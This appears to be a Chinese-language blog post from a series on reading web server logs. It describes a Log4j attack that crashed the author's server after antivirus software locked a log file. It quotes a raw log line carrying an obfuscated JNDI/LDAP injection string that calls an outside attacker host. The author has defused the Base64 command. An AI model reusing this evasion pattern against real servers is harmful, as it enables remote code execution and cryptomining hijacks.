從 Web Log 學習系統漏洞 82 - 又見Log4j攻擊

之前講過 Log4j 攻擊, 最近又遇上了, 不過這次因為 Log中有攻擊碼被防毒軟體鎖住 Log檔導致 Web Server當機, 還真是無法防範

95.214.55.244 - - [09/May/2023:17:35:35 +0800] "GET / HTTP/1.1" 200 1833 "t('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/dGhpcyBpcyBMb2c0aiBoYWNramFjayBhdHRhY2sgY29kZQ}')" "t('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/dGhpcyBpcyBMb2c0aiBoYWNramFjayBhdHRhY2sgY29kZQ}')"

這次攻擊方式與上次不同的地方, 它於 Log中的 Referer及 User Agent置入攻擊碼, 由於具危險性, 我將其中的可執行亂碼另做編輯過, 原本的是執行其中程式碼下載某處的 bash檔, 再執行此 bash檔綁架你的伺服器當成挖礦的殭屍主機

調查其中兩個 IP:

95.214.55.244 來自波蘭

45.152.113.109 來自俄羅斯

下載的 bash檔分析其內容, 連線到的網址, 結果是個挖礦網站